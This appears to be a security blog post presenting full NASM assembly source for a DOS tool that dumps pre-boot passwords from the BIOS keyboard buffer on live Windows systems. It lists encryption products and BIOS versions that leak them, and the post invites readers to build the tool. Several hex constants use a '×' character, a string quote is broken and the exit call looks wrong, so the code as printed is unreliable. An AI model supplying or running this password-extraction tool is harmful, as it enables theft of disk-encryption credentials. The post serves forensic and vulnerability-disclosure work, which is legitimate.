Duplicating Volatility Bioskbd Command Function on Live Windows Systems
I didn’t realize there was much demand for pulling passwords from BIOS keyboard buffers still until I saw that a “bioskbd” command had been added to the new 1.4 version of the Volatility Framework.
Examples of products that leak passwords in this manner:
Microsoft Bitlocker/Vista (SP0)
TrueCrypt 5.0 (possibly older versions also)
SafeBoot Device Encryption v4, Build 4750 and below
Secu Star’s DriveCrypt Plus Pack v3.9 (possibly other versions also)
DiskCryptor 0.2.6 for Windows (possibly other versions also)
Lenovo 7CETB5WW v2.05 (10/13/2006) BIOS (possibly others too)
Intel Corp PE94510M.86A.0050.2007.0710.1559 (07/10/2007) BIOS (possibly others too)
Hewlett-Packard 68DTT Ver. F.0D BIOS (possibly others too)
These passwords can be retrieved from a live system running one of the vulnerable products. Below is assembly language source code for building such a tool. NASM (free) can be used to build your copy of the tool from the source below.
org 100h
section .text
_start:
mov ah, 09h
mov dx, welcome
int 0×21 ; display some greeting msg
mov ax,0×40 ; 0×40:0x1e : keyboard buffer address
mov ds,ax
mov si, 0x1e
mov di, buffer
mov cx, 0×10
leakloop:
mov ax, [ds:si]
xor ah,ah
cmp al, 0×20
jae keepcopying
mov ax, 0×20
keepcopying:
cmp al, 0x7e
jb keepcopying2
mov ax, 0×20
keepcopying2:
mov [cs:di], ax
inc di
add si, byte +0×2
loop leakloop ; if CX not 0, then decrement CX and loop back up
push es
pop ds
mov ah, 0x3c ; MS DOS Create file Function
mov dx, fname
xor cx,cx
int 0×21
mov ax, 0x3d01 ; MS DOS Open file Function
int 0×21
mov bx, ax ; AX has the file handle if the open file call worked
mov ah, 0×40
mov cx,0×30
mov dx, Msg
int 0×21 ; Write buffer to file
mov ax,0x4c ; Quit
int 0×21
section .data
welcome db ”,10,13
db ‘Dumping password to file : PASSLEAK.TXT’,10,13
db ‘Look in PASSLEAK.TXT to see what was found in your BIOS keyboard buffer.’,10,13
db ‘This is a circular buffer, so your password might wrap around to the front.’,10,13
db ‘It should have the last 16 printable characters typed at the login screen.’,10,13
db ‘$’,10,13
handle: dw 0
fname db ‘Passleak.txt’,0
Msg: db ‘BIOS keyboard buffer contains: ‘,0
buffer: times 32 db ‘X’
;EOF
References:
http://www.ivizsecurity.com/security-advisory-iviz-sr-08010.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0807.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0806.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0805.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0804.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0804.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0803.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0802.html
http://www.ivizsecurity.com/security-advisory-iviz-sr-0801.html
email: david @ sharpesecurity.com
website: www.sharpesecurity.com
Twitter: twitter.com/sharpesecurity
Twitter: twitter.com/patchmanagement
